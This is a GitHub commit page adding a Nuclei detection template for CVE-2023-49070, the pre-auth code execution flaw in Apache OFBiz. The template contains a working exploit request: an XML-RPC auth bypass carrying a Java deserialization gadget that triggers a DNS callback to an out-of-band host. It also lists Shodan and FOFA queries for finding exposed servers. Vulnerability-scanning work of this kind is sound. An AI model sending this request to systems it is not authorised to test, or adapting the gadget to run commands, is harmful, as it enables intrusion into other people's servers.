Skip to content

Commit

Permalink
Merge pull request projectdiscovery#8774 from your3ch0/main
Browse files Browse the repository at this point in the history
Create CVE-2023-49070 (Apache OFBiz <18.12.10 - Arbitrary Code Execution)
  • Loading branch information
pussycat0x authored Dec 7, 2023
2 parents 108e996 + e425200 commit 4e5c74a
Showing 1 changed file with 64 additions and 0 deletions.
64 changes: 64 additions & 0 deletions http/cves/2023/CVE-2023-49070.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,64 @@
id: CVE-2023-49070

info:
name: Apache OFBiz < 18.12.10 - Arbitrary Code Execution
author: your3cho
severity: critical
description: |
Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.
remediation: Users are recommended to upgrade to version 18.12.10.
reference:
- https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3
- https://seclists.org/oss-sec/2023/q4/257
- https://twitter.com/Siebene7/status/1731870759130427726
- https://nvd.nist.gov/vuln/detail/CVE-2023-49070
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-49070
cwe-id: CWE-94
metadata:
max-request: 1
vendor: apache
product: ofbiz
fofa-query: app="Apache_OFBiz"
shodan-query: html:"OFBiz"
tags: cve,cve2023,apache,ofbiz,deserialization,rce

http:
- raw:
- |
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0"?>
<methodCall>
<methodName>{{randstr}}</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

- type: word
part: body
words:
- '<name>faultString</name>'

0 comments on commit 4e5c74a

Please sign in to comment.